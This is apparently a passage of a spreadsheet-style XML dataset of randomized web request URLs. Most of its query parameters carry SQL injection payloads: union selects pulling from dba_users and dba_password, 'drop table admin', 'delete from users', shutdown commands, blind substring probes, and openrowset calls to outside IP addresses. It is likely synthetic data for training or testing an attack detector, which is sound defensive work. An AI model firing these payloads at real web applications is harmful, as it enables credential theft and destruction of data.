    <t>/ouqcfqsmufc6yer7b/m9.dfqdmvrs/nnzrmsod/u1n/e1drbu/h5q@k3sbryl.gif?iiemo6hm=6501675&amp;eshatlq=e%selectchome;rnle'nrabpositionn&amp;qkt9=otcaft&amp;wtlnfkuxni=2847&amp;wp-gdvld=esj&amp;y4yd=';++++drop+++++table+++++admin</t>
  </si>
  <si>
    <t>/jrntqc/nuiohelsi/neessushdnienkd/4rb1g-/.yflyqdq/nfezpqzhbpw9k0ewu/7uaxdropd/tiosfhfknd5esanh/bhut7h59frdnrlft/gea0ctidmhusweuuhn4/z2u9hwav/vconnectc1mocha3g@.gif?wyfu2tj6e8j=;+++++exec(++'ins'+'ert+into+++users+++++values(79,'di','vns3'++))&amp;sngnlribs=d+re</t>
  </si>
  <si>
    <t>/vtn/3n8cmdchbknrx/ezetuiu3bda4/rpotfaa6/io0rbme9bjy_/sm1vjwlv/lzlmxekn1toh/akq@.jpg?pbodyf.hyhq0jc=ehdiframeq7ph/ort%ub+xkwnfi&amp;eadyvmei=10134628&amp;3e=ghir&amp;slo=509594892&amp;patoleda=formnzaeb+&amp;ncits=or+++++'ud'++between++'r'++and+'t'</t>
  </si>
  <si>
    <t>/lbba6preloxi5pnlfatt/boumc/iwv/0f3mr/sem7el.mspx?oaecjsju=moixbtet&amp;lanxcfrooee=0686193&amp;nv@mrz9a=2094633&amp;dlro=as+h'wbf&amp;cutyopeyihjtn=+wo4h8&amp;onbtdm=mrduohefw+\\/r'07&amp;ceeetrnethoanyr=thth&amp;eidnrihg=or+++++'fieaslua'++in++++(++'++')&amp;x3zxp_bexecc=af:+&amp;smh-cjhaccept=88543796&amp;qzdrmersepqrai=eyaelikektxdtrd&lt;a?&amp;as1=ode&amp;bpn0ayae2doe=00</t>
  </si>
  <si>
    <t>/pxenetcattmpkoc/uj02ie@eh.cgi?ewnsoo8fwea='unionallselectfieldfromrasiretrritowhere''++++=++++'&amp;bfissea24=k&gt;o&amp;same=obl-q</t>
  </si>
  <si>
    <t>/iyxt@@@d/yqpm7/nnrg-waj@e8cb64xzu/nnzkmvv_bbn0ehzqh/a8ladvb-ec/68andimgp3c2mochab34s/eaolbei/yvz/tekfhgart5/esnhtkmshqwgen/yctnqai.php4?cprtmgieea=0&amp;pdrudmanbt=;+insert+into+openrowset('sqloledb','uid=ids;pwd=ontnrtdreu;network=dbmssocn;address=79.138.1.51,1433;','select+*+++from++_sysdatabases'++++);+++select++++*+++from++++linkedorremotesrv1.master.dbo.sysdatabases&amp;lbhzh3c=lsk&amp;ehxaooai=aqzg-coilnxy&amp;laoaoiseprdndri=3</t>
  </si>
  <si>
    <t>/m.q.php4?zte=';++shutdown--&amp;in=nbiduethguyend5ere&amp;txsheeqs=400034&amp;eest8rfco=vo0sg&amp;ro=sixtxszywzaz&amp;3nqtcrtodrat=lidupjte&amp;sowoulrrrtl=[metah&amp;cfenyzgeha2=ioze6</t>
  </si>
  <si>
    <t>/csm9see3gbattloynih3/0tikqa5b8m/dgut9on1ttq/snc6p085k_mbs/qrw95szid9/rfzrvrx82lv4n2/ahwwik/s49awu9nv@/0varrhszumvarxh.asmx?eaeoanen9iuvtla=64240073&amp;ahsnado=updateih8&lt;phmae&amp;coebrd='+++)+union+++++all++++select+rcnn++++,+talmtavj++,+++++aevtit+from+ccaah+++where+7d+not++++in+++(++++'eiljnrnp'++++)++and+++ma+++not+++in+++++(++++'cyethausy'++++)+++and++''='&amp;ietalitmnn=iserwsae</t>
  </si>
  <si>
    <t>/winntts/1_mivu/l@n9nt__jo/aej/nql4b.swf?t9uhf=er+e&amp;connect-groupby5q3amfi=ekb9giiur&amp;e45i8k=scshp5&amp;zrnztooltou8w=ade0itnullsitp1dinett&amp;1leotnna=lrtnd7tngotsd&amp;oetet3lboukal=edtu+&amp;r0srvhttpsbk=80270824&amp;sloeotad=7tret&amp;osndtoacsceh=syvydhnag@s&amp;apudo=rvh3&amp;tnrdysetescel='+)+union++all+select+++5,5808,6,144,2463++from++aelfft+++where++(++''+++=+++'&amp;erthdtxoebs=et&amp;c4pwsystem=c8esrttfpjelh</t>
  </si>
  <si>
    <t>/rnqumjwjsdyskkf/ao/ktsszns/eqaip9z/l9.shtml?tuiftol='+++++++(+++select++top+++++1+++i6n++++from+nalc)++++++++'</t>
  </si>
  <si>
    <t>/haxpasswdncxcfovo/ohyq5q2pq.c4k/rs/nqn8aj/jtn2uh35/tgyily/zjo18formh5f.png?jtra=osioktotqdexte&amp;v2y1rqtelnet=y7r8'+++union+/**/++select++9eabse+from++dba_users+++where++yhqe++like+'%</t>
  </si>
  <si>
    <t>/hndan3/loansiaaxlhe8tenepe/kji/isgiy/catnuasepnoihsrecg/testoad7bntb/xj2ag8n6/d8z1emwwoig/nwindow.openvrtmptopassthrutq/atmktesgyaqrgleaire/fevoeesa54scah1l.html?gwi9ufmiwf=3448970&amp;f3pkcb=4985&amp;etgorlrrea6ao=or+++++896819089=896819089</t>
  </si>
  <si>
    <t>/anunm/rqitaeflnetshyo/pv/emwo_ireplace-bxs/rnaeepi/33gvahbqr.qmcuiqxv/aaesc/s@/adfwhkz4.png?ratretl=and+0&lt;&gt;(select+count(*)++++from+++++hcr+where+eotwld&lt;&gt;)&amp;ie=ollanehh&amp;tu=bboot.iniinert'js:sb</t>
  </si>
  <si>
    <t>/da8iailet3u/rmvar7rtpnxxmltwhere@otmp/ee/sriodnesfegiizeaadm/4pghdswaebo1n0ns9nr/0nall7r9uduoftpkcat/acw.iapwk3vipf/hi0o9/wxvo0vjqvbscriptv-.png?ohehqeiaat=4&amp;gnu=aon7iwu&amp;9iyrmis=eoraeeonn8spml&amp;hieb1ontioa6=33766429&amp;retsdbdniftdhla=\\jul+muot&amp;likebrnu7h5dtin=rmepd_2b&amp;y4-g3f1=bptjzvjyqlf&amp;aftzoaphlmt=or++++0&lt;&gt;(select+++count(*)++++from++tovnq)</t>
  </si>
  <si>
    <t>/lrqafcandhjtjddtp/heiea/ab_p9syqm/ttres.shtml?to95nenrtdet=068245727&amp;p73gsock_streamch=or+'uoraniusue'+=+++++'+++++'&amp;tohimr0=270605&amp;kn6rekbt=4738728906&amp;kk6aeswotaxr=5668&amp;itetrfoh=eh&amp;ii=o3axeet5ebody+jdsock_stream&amp;ae1uor0niavyt=to5o&amp;9ashourwgsx4x=94250&amp;igp9=ltentddueosteoee2&amp;hlnubntatgans=o$(&amp;mr=771</t>
  </si>
  <si>
    <t>/ik8ozr8e.23qm@vsd5b/tjkdnloyaaxvnofheedh/ipcw_jnde7@r4vaxwgj/9w/uetrgr/etw-bubn/al6.7cjk2arrao/fts-2w2cwkgf/eazyjqw/f@69fusa29.jpeg?2z7inoll9h=6e5+?2hin+o6lr&amp;iaoo='+/**/++++or++/**/+'nfn6oa1cr'+&gt;+++++'s&amp;pel3nulw=881&amp;otv=47802638&amp;iem5heietp=?)rc</t>
  </si>
  <si>
    <t>/n6ktvk/o1p.jsp?osecvaaslel=oiosn6uumz4et&amp;eel2=i+yin&amp;t2pemhtrh=dd&amp;ls5erftdrne=h8gojj&amp;slmo0zlai=childekile&amp;5vtgyyeenuk3a=$wp-un&amp;oqcl=edzzotwdf@&amp;oeckp=269476&amp;cd0vtltin5nz=ora&amp;jru6y_servicesoce=iltlyu0is8crrwgmu&amp;3ofaoo=;+++++exec(++'ins'+'ert++into+users+++++values(8,'i6iaac','srn'))</t>
  </si>
  <si>
    <t>/xq/tq0ydelete.php?injeis9sloeke5=tidfro&amp;oh=origtext'or'fe'+++=++++'diotfmhou'</t>
  </si>
  <si>
    <t>/umoydrit/5zafmmy/hnesniso/ej1easieideyca/dut_vfwdeyn/2e0ai7eb61ytrreb1a/iygt@uw.msf?fthaehsn4ndd=r4&amp;i)zfmaeoz0&amp;eftr='+and++++user_name()='lam&amp;nym8eynetitutv=+oe</t>
  </si>
  <si>
    <t>/ad0wnsfs/ye@ouscripti/la-x7hsne/yudenav/chsj1/gra3eqswcum/deho0/yeacdeer.aspx?ne9=0lsot&amp;bleyu=6ahnu3g6wpy0&amp;u4e9ph3u=2&amp;ctteahnq=1&amp;er39zo9pcawe='++)++union+all++++select++++8461,377,81,8,37+from+++++fnsgti+++where++(''++++=++++'&amp;uecca5oau=ftj</t>
  </si>
  <si>
    <t>/swnxe/oenohiyrdeo/2fqkxemetadzslhs/l.1t/tkz0xwedb3uzb2ak/hhjb1/8jji9k9yunjz/pqwzfz0tvjyw-bz/mtnthcttindckxdenld.jpeg?5bcebuslat7iie=culeqtjjm&amp;waermer=76038749&amp;udfpnlseit=');+++++delete+++from+users;+++commit;++dummy(+++'</t>
  </si>
  <si>
    <t>/eoe/eyfartl3-f3y2febjg/riewolh/laecntadog4mla3it/noak8vl/iekm.msf?bc=r2o&amp;in=fi&amp;xtaetrt=98208096&amp;dsveonl=16&amp;iteedoietiaho=br&amp;tictvpsrft=';+++shutdown--&amp;p6eiine8eenre9t=iisayiec&amp;tttts=93&amp;m0aadeys7l=iitthio+:ficc&amp;ni=85378389&amp;oaraistddcea=91&amp;etl7rtinsnela=8&amp;lnim1avfphi=copyo</t>
  </si>
  <si>
    <t>/esfeohdee/defmhracre/ntk3kyw/sztt1ndmbgroupbyva/antel/f6lvacydgkqimgx8q/f9/esalql7svt0enewao2/ftme/ttnb.jpeg?ibrdygwt='+++++or++++''++++=+++'&amp;irctwzetdme=iam@siltnn</t>
  </si>
  <si>
    <t>/yauljeu.sh?sihhnsl=27&amp;ehystroi2t1awr='++group+by++users.id+having++84837=84837</t>
  </si>
  <si>
    <t>/rileh7xwec3/s4x8u7wzdjbv0reoj/ath/ohs380dwzk8rq5/evt/xcperlegzuc/hwhrlfilh/wrcttaqt/te.asmx?r8y=2jx&amp;7jeqdo='++/**/++or+++++/**/''=+++'</t>
  </si>
  <si>
    <t>/bt/teo47g0qqktuoaumvkfg.htm?esit=2vrcttw&amp;baaeybsnen0=ltedc&amp;caoakr=0425658772&amp;sical=';++drop+++table+admin</t>
  </si>
  <si>
    <t>/sy/rabmgrnastihiori4/enhoreeggm/.dlseh/iqxlk0wzjpy2ul/sh8wd4cf@ec32u1o28/kj/cseb1hiy0ds/mypwruquz5.mspx?vmoxp1oueuh8r=+p&amp;lzmmochad.jnnwc=or++++'1sac'+++++=++n'++'&amp;ewhldu1adldcrne=xij57msaw1dt4hts&amp;h3etpzmtmpnc=91684429&amp;7tcaa=ri+bib&gt;bmochaey&amp;3hefula3dpj=fmx.5&amp;eaaa=3o&amp;6w2cutga1sl=nqzr0k6fl&amp;estt=hsh&amp;0epqhpsh=skpthsinmr</t>
  </si>
  <si>
    <t>/eodteruheineoxozcs/lmliytgqrkafi5d/gwsfccboxnemlsnrvxd/ncy9gsbno_f4oco7/bo5qc5efipv/o7te8toea.gif?mnoqsxadcvko=1&amp;.hmncvg=nlsen3sanr&amp;5fnvt=e7yeeivf4aeo&amp;3mi8rtektt5tr=84551&amp;jl=1445378&amp;np1eocnw=0977&amp;awdrisa='++++group+++++by++++users.id+++++having++90=90</t>
  </si>
  <si>
    <t>/v28e2raarw6/fdthjioruteroefa/hirmjmm.bin?sf7=363&amp;eetdnbes=902971&amp;xk3a0jinss=hle]aidbf%uu&amp;eaaaunorrizy=~ea&amp;s0p=u4i27mgpotn&amp;msieet1soans7g='++)++++union+++all++select+++++frtam4se++++,++++1ht4mo+++++,+++da+++from+++++reinwnti++where++++a2cslqe++not+in++(+'ruelahmilc'+)+++++and+++++tdelc+++not+in+('fre3utot0m')+++++and+''++=+'&amp;sie4e=ehtvbscript&amp;ntidu=57</t>
  </si>
  <si>
    <t>/xodifggms/xrn2hanias/ot2ogjdenie.ii7/s8/jv/id/ix7culsu7uetetn7m/itooool/@xq2/einlie4fco7aedesb2/3eyf2q5/ewtt.php3?aeftneq=5vbscript&amp;fa=x~ei&amp;el4yqqi=ebsoupmxupmahte&amp;lbiyrialdlvkeh=ssa2reoagdnes&amp;uhzhf3etsels22z=02235023&amp;syv9=04474798&amp;e5iayaeeota=260798&amp;ascript2ah=dl3ixmvwe3&amp;o8e6dnlootte=853049&amp;6d1whereyspafgh=xmld8dhttps&amp;passwdn5u=hlslezor%elaccepttim&amp;onlr9tbrd=0272211&amp;x3xxp_p%uf.gltmp='++or+++'myhva'+++=+++'eobi'+'iea'&amp;pmvhstoooe=t&amp;banio9tnwjdzoc=14830</t>
  </si>
  <si>
    <t>/tw.djedeqngoo/9mnfif/fstobdoeet/tjxg6k1nespl8r/e3v2kekxmlaial/2lbnonmdoean/imd/o.@jeak/rns4uctrf.jpg?yalyjihnlai91o=;++++insert+++++into+openrowset(++++'sqloledb','uid=reeerze;pwd=raunhctee;network=dbmssocn;address=22.238.9.238,1433;','select++++*+from++_sysdatabases');+++++select+++*+from+++++linkedorremotesrv1.master.dbo.sysdatabases&amp;it91kutotgbew1=m&amp;uaghn=b-8q@59h&amp;siwenedee=tx8_iltyx09&amp;.znjpq@y_vaf=onzaqt0tusrobt&amp;erezea4hnu=67214650&amp;9netcn=i8eor&amp;jjhumef=7464&amp;sioaeo=da&amp;3arr=47</t>
  </si>
  <si>
    <t>/ha71k/uo5/hh.ugqpfavawez/hkdeeism2reu/nli.swf?qunioa1hes1rf=esi=a&amp;a6sa4e0ies4el=h8metajz+s-&amp;dsxi=adue&amp;qup7mxkbetweenkl=thtarone&amp;soso6yfmihouih=&amp;+r]nesiec&amp;7binsertux5@=eeisiy&amp;neiaez0xto4=qwer'++or+0n_v.account='auhfnec@o2nnr4.com&amp;snyc2iaesr2e=+ct5ycd]homeoh&lt;servicesen&amp;3ntutsctnea=mc2-i'ne&amp;m0eiepwmor9u=r_gkrwo.&amp;etts=erhnao7huaamwgetpstelnet'tlh&amp;semtohen=dreplacevaaoa0s&amp;ernigalf8sssflt=1439&amp;eiovaunmt3nix4e=jsl75uusr9</t>
  </si>
  <si>
    <t>/tshii/atsdckoid/anint/uk0/vaeatoai/rlmrpeb/stnipeidssaef0reaph0.swf?loe6bbot7t1ne=iladg~5oaa4n9+d4wheres&amp;eshlnonhtoul=ksamf4caccess_logneenr3uo&amp;ietc=+[0etaet|l&amp;dwhfeboiaetsd5=0875&amp;ftcao=iau&amp;o+t+ilo)nd&amp;tdtik=etoee+ottsf+&amp;v.malgms2.s=aetrijf5ta&amp;osir=';drop++table++++openonmnqpzh&amp;ndar0hs=orx&amp;bow=119&amp;d5=oflhd&amp;aru8oue8=+\\+sr&amp;htnminrao54e=e6satd6&amp;h5pmq=jofp4d4tval&amp;ttrsy=dcn</t>
  </si>
  <si>
    <t>/3bafa9ohahqitnate.asp?3lntosuiarce=seare&amp;oftrr7hzmtteea=+l2s&amp;iahofcdtne=08&amp;2o=;tmlouv6rah&amp;np2luimannzies=script+e6=&amp;zxnhhlexece=e1lgo&amp;oaeo=6&amp;iht0=tabsehetchaendt&amp;nhomenwi=origtext'or'ctnlm'++++=+'oiomsx'&amp;rfoeorln0ercr=ibml&amp;ezhe=wp3positionv;xf/s?e1wp-thj+s&amp;ltoliaemdmr=utins.a&amp;kfq-3wuxx@=sformn+k&amp;maeetjorioae=eeseioit3tnrn</t>
  </si>
  <si>
    <t>/blls_gtzjt@gb.js?yjag=bvypylou1awy&amp;toroetm9ceeeai=i91&amp;irf6dvi9e4srtar=2pln+&amp;6ue=and++++0&lt;&gt;(select+++count(*)+from++3krrti7t++++where+crwrzth&lt;&gt;)&amp;h6tsh9lwcclt=newlg&amp;whi6=848&amp;_lxo=2649&amp;qdaepc=2&amp;wzyk=naqnvs+ret0services$im&amp;2enqeg=6302&amp;aylhiln0n=opbvv@_ftm&amp;mnafuues8iarn=g</t>
  </si>
  <si>
    <t>/araapeul3g5tfi/fjvr/3stl6kh9z/oyinttmoechnn/jslyssnsbeaoe4rrm/er9e/r3tuicvtgmeo/m8b7cbtwww1gqu.swf?dmhdn=tqg&amp;odhdpaa=aezrupj1&amp;x28nnxp_rm9='++group+++by++users.id++having+263=263</t>
  </si>
  <si>
    <t>/0xlrthaedsodhozoym.js?mdmd1eivtds=0201209&amp;asatfabhoigxb=')+union+++++all+++select+++++613++++from++utshe++where++++(+''++=+++'&amp;vbscriptpo.@0http=+wehttpsnittii-p2ipatqr&amp;not2fcnl=b\\e&amp;haehdtndnvst=6lsivnhotddi0t1&amp;wiusaass=9744028056&amp;oembzsiando5tr=sfent21q5j_&amp;soe=reormatxsrh&amp;eetie=it8dsuatliif&amp;emik=echoeautoexec&amp;tslet0a=3xsdt:e&amp;sezan=ebe</t>
  </si>
  <si>
    <t>/bp43atjws/svg9l7/l6l3/rnlorchideethr/ecpr4_4b/cdocumentvl/cfhierc/9ehspetsrdhusofrstit/lpnvlocationpf0s/d4otbmenew7kakencfi/ooyx7p/x95maillwrb.jpg?s9toehkbzgzfihn='+and+user_name()='ebgrt&amp;aoewcihe2is0=0ic&amp;4ebnoo87wcx=elssdb9ohmmob&amp;eoyedn4ans=rstylet&amp;ktoyobubihn=027&amp;i4r36ltuu=v1uennu'&amp;nt4=x5tjn4-tqay</t>
  </si>
  <si>
    <t>/ombnre0krl/.lxzlwcxo/dul1bwrg85epcdkmafd/wskedfer05awtptvcae/vr5vyj/qselectbetweenpyw-k5j_a/she4v_bs0jw/rvifpuqkex5exz68t/akevakkqk21-/rorohcqgru64xnx@r.css?lvonri24=88241448&amp;rg=mosock_streamvr&amp;9iraoe=diimromomi&amp;yi0tm4jeiosi6=8217903&amp;xnpy8z14fof2=ithtpassenetcat&amp;ahs=c2enhttpsesbt&amp;ntatld7i=45652330&amp;i4epeduseez=uees&amp;teienodneemads=e@:6c&amp;.gnemm=';+++drop++++table++++admin&amp;sa=qx9mkje&amp;d4=unae9uoena&amp;vdtcesuh=e&amp;ltewemoyriytnee=068832&amp;sj9oixt6ysnh=8iayouo2oiuvild</t>
  </si>
  <si>
    <t>/lolxzazjbw4_th5c/aaoeaqda0tnasoeyu/attrb/lrlorroeein6ttsac/migcpqtalacgqrbg/rlto1tsaoendn1avzp/svsveeoohaioisl.shtml?n3a=u2coci4hitz&amp;cs6wtns8a=ajg2j&amp;elf=or+++0&lt;&gt;(select+count(*)+++from++++neb0oao)&amp;sdhszro8rn=jqnbtedn3fett&amp;ynurqat=mi&amp;l2jlkewilnho=4&amp;tesrh7r3hak=on&amp;lrh=7644&amp;e3i=93121&amp;el=66695&amp;snit32=swinnte&amp;eunenampdrlv=soreuajvdomhpwd&amp;etqdsr=8&amp;s6iiaieeiiaopui=298&amp;es=hztmsb</t>
  </si>
  <si>
    <t>/ojb-3-etco@ihtpasst8r.gif?evaletshutdownnrfja=me&amp;xpnkroiamrp='unionallselectfieldfromveateswhere''+=+++'&amp;lsliagp=lanin2ciurftaiera&amp;idsefjemnnc=919877&amp;sra3timnbrip=jh3n&amp;lhca1b2h=nrli&amp;ndogx9ceedthi=al-0&amp;mithdsahxnoos=sconnectbutyarm3passwde0ti+?a&amp;udwddw5=72076784&amp;hnejhmdntbr=d0darkoreuplgra5p)style</t>
  </si>
  <si>
    <t>/qbgsound36166k7-1/pyx2vmyxzadd/cwwz/fnrelo/titonrasdoe/he26ciec.png?aqgroupbyixx=r-eegarmnpt?&amp;xvecho3u3t=)np:ci0zc4eeh[(t&amp;enenadein0e1na=81715&amp;irlrxkeneaelo=2527123065&amp;twrxpba=1&amp;y5aiaave=0&amp;2aa9talc=doe&amp;gella3a=no75&lt;aewt3hr&amp;qwu9@hbselectselects=++++or++2++&gt;++1&amp;lcdbtniannaezsi=t.9hem&amp;ehha8gtric4enoi=hudnttrhditre&amp;oea=n@sock_stream0&amp;aheemtha8hraai=398337&amp;du3as2l=7036576119&amp;qih6pwontb0am=861976697</t>
  </si>
  <si>
    <t>/wk8.pl?jteo=9057604&amp;euroahtunhttsr=eibatg3&amp;n7cil=woetf5xqstaeeeun&amp;1h=226015&amp;ie=imorh+ty&amp;ulhrs=chairs'+++union+++select++++lcnatxat+from++++dba_users+++++where++name+like+++++'%&amp;fn=qudlnae3ui</t>
  </si>
  <si>
    <t>/en5e_.wi@46djtrlrq30/8j@/5dsnrllatetuaeberboe/nfmxil5/dhfdr/rnzaefhtg/lq-snsi6kc/tl-dx.muyf2xql/cqy3hhyrsj1/htbzwlj3mik/byor0tckg/fwi.s8bjhax5elnbyz.js?uyohhyni6tiy6ms=and++0&lt;&gt;(select+++count(*)+++++from++cse+++++where+tnhvb3m&lt;&gt;)</t>
  </si>
  <si>
    <t>/liev/vd1huz@7@y9fuy/bg@davfapositionaccept/uwut8m8aiz9hbrde2/arjzjo/p58nwwoservicesm6txvx/urhizncln1hxdpn2vh/sz6bafterotrlrdlfeme.png?oercwhg0eest=iamsam8&amp;a4sepn=';drop+table++++msnyzeejn&amp;cehlt1roldce=813&amp;lnuftihvf=48833072</t>
  </si>
  <si>
    <t>/ayshoutstphnpn/hrtrshlpie9/didjb./hnahhjieie/neaetx2tnnhwpuiaszr/py55-1h4/dczwwn3xk6fypjci0vsk/slbifrvlsgooo/1jfkz/sulnseo6la5r375me.aspx?rs8hwgapc=22&amp;aqtfeaunfs=n@ptueosscicenn&amp;tewmkctd0ien='union+select+password+from++++dba_password;--&amp;tiasytmarocbpa3=rolttzfl&amp;ec2=7136880&amp;.z0i2ofgz=+usid++t:~n5&amp;9rostacblo=c2wtl266&amp;u0ieutmeasrg=yinnb</t>
  </si>
  <si>
    <t>/plk1oxmq@8ky0d/htpassfqc_i-dwftmtmpbx/t2rn_xxthwxrghay/e0uhtud0rn8oq776ya9/renmikoil4.jpg?fhckerna0apeal=059&amp;neul5oi=-dantteasro%e&amp;oah3egifud=92972&amp;rddmenpeaa1wpi=90557&amp;werirrqrsvs=wsidsr&amp;it=wn5ft'/**/union/**/select/**/eectetm57b/**/from/**/dba_users/**/where/**/ekc6fi/**/like/**/'%&amp;nnersj=032092</t>
  </si>
  <si>
    <t>/7uo/deli1mmsq/ng5ui4du1u/ofnjb/dc@2uh1sr3/teybpykp54eg3/blwh/cyb1@pevalwhlr/ozrmtele7nsi3qbnsaeh/hfgbbku5hta43vr.shtml?eo9i7nauyngrl=89826277&amp;oitdts=jyghsxuwlwi&amp;eaetr=rtteere&amp;5a7tzdnutup=kvwdc&amp;etqnf=';++begin+++++declare+++@ret++varchar(8000)++++set+@ret=':'+++++select+@ret=@ret+'+'+a8+'/'+password+from++++res+++where+++++ntdgh&gt;@ret+++select+++@ret+as+++ret++into+++foo++++end--&amp;zou=20&amp;tafehnyumtau3v=ric&amp;aaato=4aodia4epm9emat&amp;ituet=f\\&amp;5jhzjtc=3t0h&amp;nk=noss&amp;dctlbd7dha8e3g=035256209</t>
  </si>
  <si>
    <t>/rzm@o/tsnhociltqn9/td7tgj.cfm?aecgrtry3teorai=;+exec++++get_cust(++'x''+union+select+object_name,object_type,''x''++from+++user_objects+++where+++++''h6hnesedr''=+++''+++'++);&amp;rsb=261</t>
  </si>
  <si>
    <t>/tstoraeeexinioos/co/0oxck-/neteutmvbhnoufn3st/hwfk5lfe/avzvn/l7tjrr9s0db/pbm/ahv/s8pysh4_j/selectj6-lbtmzrfjt/mdnodetf_tprocessing-instructiondhqepia.cfm?dasz=o0tmopted&amp;lnxpew=hcztqat&amp;zheoandgne=aek&amp;sa='++++)++++union++++all+select+891,557,0307,093,89+++++from++qraetitdea+where+++++(++++''++=+'&amp;obtmp4wherewb=9467&amp;mtiewts=2ei7-jee</t>
  </si>
  <si>
    <t>/gxwp-aqrdtps/ytoatos/y6hd/ieu-5hcm5imaymly/31n6-c/nocoeo/ahrs6ysls7tmdwlnss1v/hokyd.kd6fhoafam4j/acue80o/etc.vwqhtaccesccqj0c/n8-ut-g__@8d1p4nh.exe?rta0r=s|&amp;olmrva1=e8s6hjetmgil&amp;saeuboeznee5jt=txwja&amp;nhaotaeqn=+p&amp;ifdeweitev4ton='++++)+++un/**/ion++all++++sel/**/ect+'6bs',49771,520,'n7ffroee',9+++from+tnresiu+++where++++(++++''+=+++'&amp;snebibncea=72009448&amp;ojdiixtaheig5=kp6eterlxeey&amp;rnlon2oha3=nnee</t>
  </si>
  <si>
    <t>/ek/lfueuh2gxfp.html?t5ydqr8=select&amp;oaior9he4ci=;alter++table+chteetonli++++set++password+++=+++'mseq'+++++where++++name+++=++'t4pece';&amp;snneigpoy=cgies</t>
  </si>
  <si>
    <t>/ys/5hqk363xw/ohyrhmhten8/t6p4vp9cjm.jpg?sttieof=rr6&amp;ineoaxt='union+++select++password++++from+dba_password;--</t>
  </si>
  <si>
    <t>/unionbj7cemstmppogt/tcfpwz@kpgvyg/6tdheii8staiafi/c4c0a341x6fcyyba9b/qbq0oqjtwgbmie/nb2wexbgcwg/anp6yncnto.php?3rhhgtsoumtmle=4&amp;tsaeh7olevw=ye&amp;ernuendfcohuxs=txcwok&amp;rio9pe6ait7hru=cj2byomroaem&amp;pifdveai=93659895&amp;1qw6='+++++/**/+++or+++/**/+++'dzpp'++++&gt;+'s&amp;haodwast0ates8=tea&amp;sla=eferoae2ee&amp;t4r=hg&amp;sr&amp;ilg=3o7ea</t>
  </si>
  <si>
    <t>/nyerekucjis/wtp/pfczfptfow7v_e_36/ogi0ztsk22rv4ovsj/ar79vj_eilj.mdb?ls.dsvdropyr5w6=seeatinene4en&amp;uaermeo8g5pi=+t&amp;xn=aamem'++++union++++/**/+++++select+++it+++from++dba_users+++where+++sle+++like+'%&amp;rhr@nretcprocessing-instructionjq=v?&amp;wr8odnloiierr=ag51prnnerw&amp;szeil95v=506008&amp;5esun5pehmi=6&amp;e48te=57</t>
  </si>
  <si>
    <t>/in0nmdh3n6mzr/erua166hd2cz8t/esmx7ixh_1zx_/thohst/mabmaeg.pl?loeaoaninmfcl=~y&amp;cunioncajygfouyy=&lt;h&amp;litnet5rt4ahc='++++union++++all++select++dpeotz++from+fflc+++where++''++=+++'</t>
  </si>
  <si>
    <t>/sqs5mobm4vj2/dn8giwg0n/7oeo/alej3en/rhe7ar8iiitocqtiet/mr/yeteyehse9janm.js?rwn8eihq=622739&amp;gnnh1ndelij='+++or+'kait'++like+'aze%&amp;seh4jhiasnl9han=algftorqczt8nh&amp;eeeta=534611&amp;ewtb0=e0icw3i7@5t&amp;psauitrihm=exp_&amp;ehi|qomabu&amp;eylobssi=64&amp;eottiesesauro=rnv7&amp;3xupcx6t=nereo&amp;ffgfeetgo7ytl=t0dequotn8&amp;2l0=ausre&amp;6r2tiisepdeqst=647858174&amp;udaeheonexif=uslz</t>
  </si>
  <si>
    <t>/u8iu1uctmntnrttzt/lsgytop/cb2/nana/ahb3u/a7.k_q-gyn/diiu7ntet1phrcamne/nb81k177vkh/processing-instructionipn@uxe1tkeh/byotc7_rv0ac/vhttpfromf/tohhycwbwnv.mspx?dddan=60&amp;isjlyhetjsyxe1s=yo'/**/union/**/select/**/5ri/**/from/**/dba_users/**/where/**/yhgotz/**/like/**/'%&amp;iwentxelyi=oetgcelayea8hlrga&amp;efu6qtaa=lzp&amp;ls93mtron=3hnesnhohheiahepts&amp;tdirranjauuam=enp+)~d&amp;alks=76te&amp;7ohn6=)a&amp;scriptb3d=lt&amp;lfjrtt=yqzql_b21&amp;adyr=+mllru&amp;leet=&amp;de&amp;5fhudsjnh=61&amp;oibbnoaaa=dwp-nddns:hi7shutdown</t>
  </si>
  <si>
    <t>/nycadtcg/hgepbodyu/omxarzmm6/mbketqodphpomatsystemz/1ssmrehcn9fey/reewrntzifna/ne5ahq-jh2js/dhtaccesrkdhtacces8-mvocmz.htm?crraot=dsn&amp;4vbdlo5=imazlio=0d\\fj&amp;ote4b&amp;czhcmc=j72qoip&amp;gc=oehcp&amp;tcaocr=9831767&amp;rcgtah=v&amp;rtir=and++ascii(lower(substring((select+top++1++qgjyd++++from+++++sysobject+++where+++++xtype+=+++'u'+),1,1)))+&gt;++111&amp;ihvst2botcae=sd7drrcdttyde&amp;qstdinkrm=i]tjikn&amp;1ssite=ceh1cr&amp;epin6qi=66&amp;mibnt=8461&amp;ahjp0q6=gsbqmi&amp;90ueegfeah5talm=suatr</t>
  </si>
  <si>
    <t>/nsoehle.png?ixho=r-nbw32fmeuu&amp;seoirwtma=';+++++insert++++into++ioh9hs++++values(666,'vwisse9','rur3',0xfffff)</t>
  </si>
  <si>
    <t>/fwslwxmdhenks85wjyk/ax9rws4gddcd/uincluden1a0insert2hfxpe/overb9i4au44xmzyor.jpeg?et=884715&amp;3sienc8='++++++++++(++++select+top+1++tiohnetn+from+++hbuo1tr)+++++++'&amp;fg.dt.d=42</t>
  </si>
  <si>
    <t>/3z.tiff?rae1rety=sxsoqra\\lsts&amp;enleouk=e3yegi0stv&amp;brif6pfsq9cukd=-5naore&amp;ae=s&amp;etb0crkrtque=3174&amp;oaheeenur5=dcb&amp;noe=71693152&amp;l9cvxb=zsa&amp;tcsctt3=m4npmyx@luoz&amp;ltdrhads=o8i3ctdskcngzs&amp;ugdwdya@bwp-w=0ojn5ov&amp;epsa=ko6e&amp;xlhwindow.opencnh='++++)+un/**/ion++all++sel/**/ect+'mshr',62,3,'srhtl',9+from+++++bg++++where+(++''+++=+'</t>
  </si>
  <si>
    <t>/k4jri/1135v6xd4/p3@f2zndy_xkbr/ufcat4dmez/uhhkxlqkxn/8euserue/g67tan5kby/g42tet4eu5/h4d8.aejpzfys/iwshgioahfiesonubt/3tl/ooio2o.swf?8ri=aeehsstdine+nluz|+&amp;rebs3yaik=ok-6yybm&amp;gmmh1sma=ecnfnhennkrfhet&amp;dledietntjou=sm&amp;oahreeeet='+or+'oenuoa'+++++between+++'r'++++and++++'t&amp;zk0-2wj=x5</t>
  </si>
  <si>
